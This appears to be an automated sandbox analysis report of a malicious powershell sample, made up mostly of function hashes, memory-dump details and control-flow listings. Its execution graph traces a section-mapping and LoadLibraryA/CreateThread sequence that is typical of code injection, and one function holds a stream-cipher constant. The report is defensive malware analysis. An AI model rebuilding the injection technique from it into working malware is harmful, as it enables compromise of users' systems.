                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: cde970b5e0387ee133783f22122a65532ace8f0a3e54da3c6b9a8fb42ad0e190
                                          • Instruction ID: b768a65d1f86bc09da4fa707e626d9f741ce511ea36b76fff240d4c8d3b23833
                                          • Opcode Fuzzy Hash: cde970b5e0387ee133783f22122a65532ace8f0a3e54da3c6b9a8fb42ad0e190
                                          • Instruction Fuzzy Hash: F0511671A0DB894FE788EB2C8465B61BBE1EF9A354F1401BDE049C72E7D9289C428741
                                          Function 00007FFD9BAC593C Relevance: .3, Instructions: 334COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2219364540.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70a7df1e4c0ac6467fb22cc08d37afd3f25fceee6982053aed26be8b64b6b164
                                          • Instruction ID: f300d3d0e30ab41b38772c5dfc9520bc3366a6dd31c673c2bcbfbef6b5ce6e98
                                          • Opcode Fuzzy Hash: 70a7df1e4c0ac6467fb22cc08d37afd3f25fceee6982053aed26be8b64b6b164
                                          • Instruction Fuzzy Hash: 3CB13E31A1894D8FDF98EF58C895AADB7E1FF68310F15426AE409D7295CA74E881CB80
                                          Function 00007FFD9BB9080E Relevance: .2, Instructions: 200COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2220339100.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cddd17e100e0e85828cc8d4f15b8a098e48d3150684a8a59a5679583526502e3
                                          • Instruction ID: 8277dbae745e184e4183fa537145cbe1499682c5cef557a1e4d75852980faaea
                                          • Opcode Fuzzy Hash: cddd17e100e0e85828cc8d4f15b8a098e48d3150684a8a59a5679583526502e3
                                          • Instruction Fuzzy Hash: E351F622B0FA9E0FFBB4A66C54752B462D1FF54B5CB8901BAD04DC71E3DD08AD008381
                                          Function 00007FFD9BAC6689 Relevance: .2, Instructions: 193COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2219364540.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e298eab9e0260f5494cb36ea6ac098cedd8a3b6bd24a46c3c707900ac08d919a
                                          • Instruction ID: 44abfcc602465365dfaa8dc752994bea16738f567d89c9774fc3b4b125a4b34c
                                          • Opcode Fuzzy Hash: e298eab9e0260f5494cb36ea6ac098cedd8a3b6bd24a46c3c707900ac08d919a
                                          • Instruction Fuzzy Hash: 35516130A18A0C8FDB58EF58D895BEDB7F1FF98311F14426AD04DD3296DA74A8418B81
                                          Function 00007FFD9BB9085A Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2220339100.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 189d4831b1e8912afbba7111a6aca18b8f8bc6c298305d77043a8a3134ddb3d1
                                          • Instruction ID: 122c0bd4c353a9bf0d8b2805ffa021b9238cf15a6e4976ee334508f724c18fc2
                                          • Opcode Fuzzy Hash: 189d4831b1e8912afbba7111a6aca18b8f8bc6c298305d77043a8a3134ddb3d1
                                          • Instruction Fuzzy Hash: 3331D422F0FA9E0BF7B9A6AC48B52B866C1EF55B5CB9900BAD45DC31E3DC0C6D044241
                                          Function 00007FFD9BAC33B5 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2219364540.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction ID: ee59faf03481a4826278b3042e26341a3348b81f49576dea66fea955f9f1e53b
                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction Fuzzy Hash: 5801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10066DE58AC76A5DA36E882CB45
                                          Function 00007FFD9BB90F88 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2220339100.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 164c1764d5b2946a061aa3f79a0b3acd8523f61051eefd6d26c121b4f5152fea
                                          • Instruction ID: 186e4544b597abb94d63466b8fe40a5c61fe06bc512df7312eced759416aa7f4
                                          • Opcode Fuzzy Hash: 164c1764d5b2946a061aa3f79a0b3acd8523f61051eefd6d26c121b4f5152fea
                                          • Instruction Fuzzy Hash: 13E09223F0E92D0AE7E5A6AC68257F4A280EF94729B8602B7E91CC21D2DC04AA1002C1
                                          Function 00007FFD9BB91C06 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2220339100.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7d69355d50f01127f003f3ce9784c023ad768b517f535ffe592cbf988d09700
                                          • Instruction ID: 6cd54e9a738161ca6bd71aa4e5887219c63d15997c2658961035d702e9030208
                                          • Opcode Fuzzy Hash: c7d69355d50f01127f003f3ce9784c023ad768b517f535ffe592cbf988d09700
                                          • Instruction Fuzzy Hash: 99E0DF23F0E82D1BE3A0A59C28295F4A2C0EF9862870606B3E92CCB1E2EC04AD1002C0

                                          Execution Graph

                                          Execution Coverage:1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:56.5%
                                          Total number of Nodes:46
                                          Total number of Limit Nodes:12
                                          execution_graph 17966 2a87347d4dc 17967 2a87347d4f8 17966->17967 17968 2a87347d57d NtMapViewOfSection 17967->17968 17981 2a87347dc84 17967->17981 17973 2a87347d5d1 17968->17973 17969 2a87347e408 LoadLibraryA 17971 2a87347d8ad 17969->17971 17971->17969 17972 2a87347d94c 17971->17972 17975 2a87347e4f0 LoadLibraryA 17971->17975 17976 2a87347da7b NtUnmapViewOfSection 17972->17976 17979 2a87347daff 17972->17979 17973->17971 17973->17981 17982 2a87347e408 17973->17982 17986 2a87347e4f0 17973->17986 17975->17971 17977 2a87347da93 NtMapViewOfSection 17976->17977 17976->17981 17977->17979 17977->17981 17979->17981 17990 2a87347e1ac 17979->17990 17985 2a87347e426 17982->17985 17983 2a87347e4d1 LoadLibraryA 17984 2a87347e4d9 17983->17984 17984->17973 17985->17983 17985->17984 17987 2a87347e660 17986->17987 17988 2a87347e526 17986->17988 17987->17973 17988->17987 17994 2a87347c35c 17988->17994 17993 2a87347e1e8 17990->17993 17991 2a87347e3e4 17991->17981 17992 2a87347e4f0 LoadLibraryA 17992->17993 17993->17991 17993->17992 17996 2a87347c39f 17994->17996 17999 2a87347c3c8 17994->17999 17995 2a87347e408 LoadLibraryA 17997 2a87347c3d8 17995->17997 17996->17997 17998 2a87347e4f0 LoadLibraryA 17996->17998 17996->17999 17997->17987 17998->17996 17999->17995 17999->17997 18000 7ffd9bacddbd 18001 7ffd9bacddcd CreateThread 18000->18001 18003 7ffd9bacdec3 18001->18003 18004 2a87347d4bf NtCreateSection 18005 2a87347d4d7 NtMapViewOfSection 18004->18005 18019 2a87347dc84 18004->18019 18010 2a87347d5d1 18005->18010 18007 2a87347e408 LoadLibraryA 18011 2a87347d8ad 18007->18011 18008 2a87347e408 LoadLibraryA 18008->18010 18009 2a87347d94c 18014 2a87347da7b NtUnmapViewOfSection 18009->18014 18017 2a87347daff 18009->18017 18010->18008 18010->18011 18012 2a87347e4f0 LoadLibraryA 18010->18012 18010->18019 18011->18007 18011->18009 18013 2a87347e4f0 LoadLibraryA 18011->18013 18012->18010 18013->18011 18015 2a87347da93 NtMapViewOfSection 18014->18015 18014->18019 18015->18017 18015->18019 18018 2a87347e1ac LoadLibraryA 18017->18018 18017->18019 18018->18019

                                          Executed Functions

                                          Function 000002A87347D4BF Relevance: 6.9, APIs: 4, Instructions: 938nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 2a87347d4bf-2a87347d4d1 NtCreateSection 1 2a87347dd76-2a87347dd89 0->1 2 2a87347d4d7-2a87347d5cf NtMapViewOfSection 0->2 5 2a87347d5d1-2a87347d5d6 2->5 6 2a87347d5dc-2a87347d5df 2->6 5->1 5->6 6->1 7 2a87347d5e5-2a87347d5e8 6->7 8 2a87347d5ea-2a87347d64d call 2a87347ec18 call 2a87347ec38 7->8 9 2a87347d64f-2a87347d660 7->9 10 2a87347d664-2a87347d695 call 2a87347ec18 8->10 9->10 15 2a87347d697-2a87347d69c 10->15 16 2a87347d6e9-2a87347d6ff 10->16 17 2a87347d69e-2a87347d6da call 2a87347ec18 15->17 18 2a87347d705-2a87347d708 16->18 19 2a87347d7f7-2a87347d801 16->19 34 2a87347d6dc-2a87347d6e3 17->34 18->19 22 2a87347d70e-2a87347d725 18->22 24 2a87347d807-2a87347d80e 19->24 25 2a87347d8bd-2a87347d8c7 19->25 22->19 27 2a87347d72b-2a87347d72c 22->27 24->25 29 2a87347d814-2a87347d815 24->29 30 2a87347d953-2a87347d968 25->30 31 2a87347d8cd-2a87347d8d8 25->31 35 2a87347d731-2a87347d735 27->35 37 2a87347d81b-2a87347d83d call 2a87347e408 29->37 38 2a87347d96b-2a87347d9bb 30->38 32 2a87347d951 31->32 33 2a87347d8da-2a87347d8f6 call 2a87347e408 31->33 32->30 49 2a87347d942-2a87347d94a 33->49 50 2a87347d8f8-2a87347d905 33->50 34->16 35->19 41 2a87347d73b-2a87347d749 35->41 47 2a87347d83f-2a87347d847 37->47 38->38 39 2a87347d9bd-2a87347da0e call 2a87347ec18 38->39 69 2a87347da10-2a87347da17 39->69 70 2a87347da68-2a87347da6f 39->70 44 2a87347d7e7-2a87347d7f1 41->44 45 2a87347d74f 41->45 44->19 44->35 51 2a87347d754-2a87347d765 45->51 52 2a87347d849 47->52 53 2a87347d89e-2a87347d8a7 47->53 49->33 56 2a87347d94c-2a87347d94d 49->56 55 2a87347d93a-2a87347d940 50->55 57 2a87347d7d4-2a87347d7e1 51->57 58 2a87347d767-2a87347d77d 51->58 59 2a87347d853-2a87347d85b 52->59 60 2a87347d84b-2a87347d851 52->60 53->37 63 2a87347d8ad-2a87347d8b9 53->63 55->49 62 2a87347d907 55->62 56->32 57->44 57->51 64 2a87347d784-2a87347d78c 58->64 65 2a87347d77f-2a87347d782 58->65 67 2a87347d877-2a87347d87b 59->67 68 2a87347d85d-2a87347d86c call 2a87347c89c 59->68 66 2a87347d87f-2a87347d885 call 2a87347e4f0 60->66 71 2a87347d911-2a87347d919 62->71 72 2a87347d909-2a87347d90f 62->72 63->25 74 2a87347d793-2a87347d79b 64->74 75 2a87347d78e-2a87347d791 64->75 73 2a87347d7ba-2a87347d7c6 65->73 91 2a87347d88a-2a87347d89c 66->91 67->66 68->67 96 2a87347d86e-2a87347d875 68->96 82 2a87347da42-2a87347da4a 69->82 83 2a87347da19-2a87347da40 call 2a87347ec38 * 2 69->83 76 2a87347da75-2a87347da8d NtUnmapViewOfSection 70->76 77 2a87347daff-2a87347db21 70->77 84 2a87347d91b-2a87347d938 call 2a87347e4f0 71->84 72->84 73->57 79 2a87347d7a9-2a87347d7b1 74->79 80 2a87347d79d-2a87347d7a7 74->80 78 2a87347d7b7-2a87347d7b8 75->78 76->1 103 2a87347da93-2a87347daf9 NtMapViewOfSection 76->103 104 2a87347dc12-2a87347dc4c 77->104 105 2a87347db27-2a87347db3a 77->105 78->73 86 2a87347d7b3-2a87347d7b4 79->86 87 2a87347d7c8-2a87347d7cb 79->87 80->78 82->70 92 2a87347da4c-2a87347da5e call 2a87347ec18 82->92 107 2a87347da63-2a87347da64 83->107 84->55 86->78 94 2a87347d7d1-2a87347d7d2 87->94 95 2a87347dd09-2a87347dd0c 87->95 91->47 92->107 94->57 101 2a87347dd61-2a87347dd71 call 2a87347ec38 95->101 102 2a87347dd0e-2a87347dd32 95->102 96->91 101->1 116 2a87347dd40-2a87347dd57 102->116 117 2a87347dd34-2a87347dd3b 102->117 103->1 103->77 121 2a87347dc75-2a87347dc7e 104->121 122 2a87347dc4e-2a87347dc56 104->122 108 2a87347db3e-2a87347db55 105->108 107->70 113 2a87347dbf5-2a87347dbff 108->113 114 2a87347db5b-2a87347db5e 108->114 113->108 118 2a87347dc05-2a87347dc0c 113->118 119 2a87347db60-2a87347db65 114->119 120 2a87347db67-2a87347db75 114->120 116->101 117->116 118->104 125 2a87347dbad-2a87347dbc1 119->125 126 2a87347db77-2a87347db87 120->126 127 2a87347db89-2a87347db96 120->127 123 2a87347dc84-2a87347dc99 121->123 124 2a87347ddf6-2a87347de00 121->124 122->121 128 2a87347dc58 122->128 142 2a87347de69-2a87347de70 123->142 143 2a87347dc9f-2a87347dcaf 123->143 134 2a87347de30-2a87347de34 124->134 135 2a87347de02-2a87347de2b call 2a87347e1ac 124->135 131 2a87347dbc3-2a87347dbd3 125->131 132 2a87347dbd5 125->132 126->125 129 2a87347db98-2a87347db9d 127->129 130 2a87347db9f-2a87347dbaa 127->130 136 2a87347dc6d-2a87347dc73 128->136 129->125 130->125 138 2a87347dbd8-2a87347dbf0 131->138 132->138 140 2a87347de72-2a87347de82 134->140 141 2a87347de36-2a87347de52 134->141 135->134 136->121 137 2a87347dc5a-2a87347dc6a 136->137 137->136 138->113 148 2a87347de60-2a87347de67 140->148 141->148 154 2a87347de54-2a87347de58 141->154 142->148 150 2a87347de84-2a87347de85 143->150 151 2a87347dcb5-2a87347dcba 143->151 155 2a87347de8b-2a87347de96 148->155 150->155 151->150 156 2a87347dcc0-2a87347dcd2 151->156 154->148 155->95 158 2a87347de9c-2a87347dea9 155->158 157 2a87347dcd4-2a87347dcf8 call 2a87347ec54 156->157 162 2a87347dd8a-2a87347dd95 157->162 163 2a87347dcfe-2a87347dd00 157->163 158->95 164 2a87347dd02-2a87347dd03 162->164 165 2a87347dd9b-2a87347ddaf 162->165 163->157 163->164 164->95 166 2a87347ddb1-2a87347ddb8 165->166 167 2a87347ddf2-2a87347ddf4 165->167 168 2a87347ddba-2a87347ddd7 166->168 169 2a87347dddc-2a87347ddf0 166->169 167->148 168->169 169->148
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$View$CreateUnmap
                                          • String ID:
                                          • API String ID: 3892452295-0
                                          • Opcode ID: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                          • Instruction ID: 3377fa88edc0b516e93ed73cf476919b359784fb85922ea3cfa4b35883f839bc
                                          • Opcode Fuzzy Hash: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                          • Instruction Fuzzy Hash: 7862A635758B588BDF69DF28CC897A9B3D1FBAA310F28455DD88AC7181DE30E9428743
                                          Function 000002A87347D4DC Relevance: 1.8, APIs: 1, Instructions: 340nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                          • Instruction ID: 0e9c5008545104eaad1c442a7662a2ecf279868c712fdd3f8003ffd29b0c4c54
                                          • Opcode Fuzzy Hash: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                          • Instruction Fuzzy Hash: 99B1B635358B588BDF6CDF18C8897A9B3E1FBAA310F28456DD48AC7251DE34E5428B43
                                          Function 000002A87347E408 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 172 2a87347e408-2a87347e424 173 2a87347e426-2a87347e42a 172->173 174 2a87347e43f-2a87347e44e 172->174 173->174 175 2a87347e42c-2a87347e43d 173->175 176 2a87347e450-2a87347e475 174->176 177 2a87347e47a-2a87347e48c 174->177 175->173 175->174 176->177 178 2a87347e48f-2a87347e496 177->178 179 2a87347e4d1-2a87347e4d6 LoadLibraryA 178->179 180 2a87347e498-2a87347e4a7 178->180 183 2a87347e4d9-2a87347e4e8 179->183 181 2a87347e4c4-2a87347e4ca 180->181 182 2a87347e4a9-2a87347e4c2 call 2a87347ec74 180->182 181->178 185 2a87347e4cc-2a87347e4cf 181->185 182->181 187 2a87347e4e9-2a87347e4ec 182->187 185->179 185->183 187->183
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: l
                                          • API String ID: 1029625771-2517025534
                                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                          • Instruction ID: e894bdb677c4d090e5c7d8d72668f6369d788aa47d4bbb4f2201e5c919f848c0
                                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                          • Instruction Fuzzy Hash: 6031A224658A954FE759DB2CC448B21FBD5FBAA308F2856ECC1CAC7192DF30D8868707
                                          Function 00007FFD9BACDDBD Relevance: 1.6, APIs: 1, Instructions: 149threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 367 7ffd9bacddbd-7ffd9bacddcb 368 7ffd9bacddcd 367->368 369 7ffd9bacddce-7ffd9bacddd9 367->369 368->369 370 7ffd9bacdddb 369->370 371 7ffd9bacdde1 369->371 370->371 372 7ffd9bacdde3 371->372 373 7ffd9bacdde4-7ffd9bacdded 371->373 372->373 374 7ffd9bacddf5 373->374 375 7ffd9bacddef 373->375 376 7ffd9bacddf7 374->376 377 7ffd9bacddf8-7ffd9bacdec1 CreateThread 374->377 375->374 376->377 381 7ffd9bacdec9-7ffd9bacdef1 377->381 382 7ffd9bacdec3 377->382 382->381
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2799239600.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: d37b4cc9f0bcb00f70d4dce053105fd26c24221271bd64ca771183574e86c42d
                                          • Instruction ID: 1e289aaeadf1cd8f6c0a1c054aadb4193ffc3e4b38e73b75fa8d89502dab4c02
                                          • Opcode Fuzzy Hash: d37b4cc9f0bcb00f70d4dce053105fd26c24221271bd64ca771183574e86c42d
                                          • Instruction Fuzzy Hash: 54413C3090D7CD5FDB5AAB6898156F57FE0EF16325F0401AFE09DC3193CA686852C786
                                          Function 00007FFD9BB9041D Relevance: .4, Instructions: 442COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2801642264.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73348b923422b64b9086354f9e5eeed2889ba8b2b02ad1dd285c23a6d608fbee
                                          • Instruction ID: 64ffcf4b72e747276612b3bdf411927bdf11b525838b51bb23d7af33ea5f53a9
                                          • Opcode Fuzzy Hash: 73348b923422b64b9086354f9e5eeed2889ba8b2b02ad1dd285c23a6d608fbee
                                          • Instruction Fuzzy Hash: 1CD12662B0FAC90FE7A6976888755B57FE0EF56618B4A00FFD089CB1E3D9089D058342
                                          Function 00007FFD9BB904EA Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2801642264.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a69116166db43050d7a13092acaee5913cf5b73c9e08b891f51885dcd0d10501
                                          • Instruction ID: 2f2e347628c0b9092ddf190b72b2dbfd7c95f66424bfb205929f16e4518e829c
                                          • Opcode Fuzzy Hash: a69116166db43050d7a13092acaee5913cf5b73c9e08b891f51885dcd0d10501
                                          • Instruction Fuzzy Hash: 0531D662F0FA8E0BF7B566A894B52B866C1FF55A5CB9A00BAD55DC31E3EC0C6D014302

                                          Non-executed Functions

                                          Function 000002A873FB7860 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 619 2a873fb7860-2a873fb7948 620 2a873fb794d-2a873fb7d2b 619->620 620->620 621 2a873fb7d31-2a873fb7e1e 620->621
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2-by$expa$nd 3$te k
                                          • API String ID: 0-3581043453
                                          • Opcode ID: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                          • Instruction ID: 8fb54e6572e0e1581ffbdb5ee120615a8efed1704c30b4fe7e6d23adcc25d203
                                          • Opcode Fuzzy Hash: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                          • Instruction Fuzzy Hash: F0C1532493AB4C1EE3C3BA298501253F344FE6E54DA20D366DE57B8491EB1FE88F610C
                                          Function 000002A874014F20 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                          • Instruction ID: c37f1436afb49693ccaa014a36ac7fd93dfd12df8a415c527e3dd3c46e38db4d
                                          • Opcode Fuzzy Hash: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                          • Instruction Fuzzy Hash: F4C08064D556594AF391C7544804778F9C0D785351F54C099D145C03E1DAADD1C0A145
                                          Function 000002A873FBBF60 Relevance: 9.0, Strings: 7, Instructions: 289COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 530 2a873fbbf60-2a873fbbf64 531 2a873fbc26f-2a873fbc274 call 2a874013100 530->531 532 2a873fbbf6a-2a873fbbf8f call 2a8740021e0 530->532 531->530 537 2a873fbbf91-2a873fbbfa5 532->537 538 2a873fbbfc2-2a873fbbfe4 call 2a874001e40 532->538 539 2a873fbbfa7-2a873fbbfb0 call 2a8740150c0 537->539 540 2a873fbbfb2-2a873fbbfc1 537->540 545 2a873fbc0a5-2a873fbc0a9 538->545 546 2a873fbbfea-2a873fbbfee 538->546 539->540 549 2a873fbc147-2a873fbc14b 545->549 550 2a873fbc0af-2a873fbc0b3 545->550 547 2a873fbc045-2a873fbc049 546->547 548 2a873fbbff0-2a873fbc003 546->548 555 2a873fbc1ac-2a873fbc1b0 547->555 557 2a873fbc04f-2a873fbc063 547->557 551 2a873fbc005-2a873fbc00b 548->551 552 2a873fbc023 548->552 549->555 556 2a873fbc14d-2a873fbc15d 549->556 553 2a873fbc0b5-2a873fbc0c5 550->553 554 2a873fbc10b-2a873fbc11b 550->554 558 2a873fbc020-2a873fbc021 551->558 559 2a873fbc00d-2a873fbc011 551->559 552->555 560 2a873fbc029-2a873fbc02f 552->560 561 2a873fbc0c7-2a873fbc0ce 553->561 562 2a873fbc0e3 553->562 569 2a873fbc134 554->569 570 2a873fbc11d-2a873fbc124 554->570 563 2a873fbc1b2-2a873fbc1d9 555->563 564 2a873fbc1f8-2a873fbc21d call 2a874001da0 555->564 565 2a873fbc15f-2a873fbc166 556->565 566 2a873fbc178 556->566 567 2a873fbc075 557->567 568 2a873fbc065-2a873fbc06c 557->568 558->552 579 2a873fbc1a6-2a873fbc1ab 559->579 580 2a873fbc017-2a873fbc01a 559->580 560->555 582 2a873fbc035-2a873fbc039 560->582 571 2a873fbc0e0-2a873fbc0e1 561->571 572 2a873fbc0d0-2a873fbc0d4 561->572 562->555 575 2a873fbc0e9-2a873fbc0f0 562->575 573 2a873fbc1e8-2a873fbc1f7 563->573 574 2a873fbc1db-2a873fbc1e6 call 2a8740150c0 563->574 608 2a873fbc225-2a873fbc23c call 2a874002ce0 564->608 609 2a873fbc21f-2a873fbc223 564->609 583 2a873fbc175-2a873fbc176 565->583 584 2a873fbc168-2a873fbc16e 565->584 586 2a873fbc193 566->586 587 2a873fbc17a-2a873fbc181 566->587 588 2a873fbc077-2a873fbc080 567->588 589 2a873fbc089 567->589 568->579 585 2a873fbc072-2a873fbc073 568->585 569->555 581 2a873fbc136-2a873fbc13d 569->581 577 2a873fbc126-2a873fbc12a 570->577 578 2a873fbc131-2a873fbc132 570->578 571->562 572->579 592 2a873fbc0da-2a873fbc0dd 572->592 574->573 575->555 594 2a873fbc0f6-2a873fbc100 575->594 577->579 596 2a873fbc12c-2a873fbc12f 577->596 578->569 580->552 581->555 597 2a873fbc13f-2a873fbc143 581->597 582->579 598 2a873fbc03f-2a873fbc040 582->598 583->566 584->579 599 2a873fbc170-2a873fbc173 584->599 585->567 586->555 591 2a873fbc195-2a873fbc19c 586->591 600 2a873fbc190-2a873fbc191 587->600 601 2a873fbc183-2a873fbc189 587->601 588->579 602 2a873fbc086-2a873fbc087 588->602 589->555 590 2a873fbc08f-2a873fbc096 589->590 590->579 604 2a873fbc09c-2a873fbc0a0 590->604 591->555 605 2a873fbc19e-2a873fbc1a4 591->605 592->562 594->579 607 2a873fbc106 594->607 596->569 597->579 610 2a873fbc145 597->610 598->555 599->566 600->586 601->579 603 2a873fbc18b-2a873fbc18e 601->603 602->589 603->586 604->555 605->555 605->579 607->555 613 2a873fbc23e-2a873fbc252 608->613 614 2a873fbc269-2a873fbc26e 608->614 609->608 610->555 615 2a873fbc254-2a873fbc25d call 2a8740150c0 613->615 616 2a873fbc25f-2a873fbc267 613->616 615->616 616->614
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: debu$debu$debu$debu$debu$l655$runt
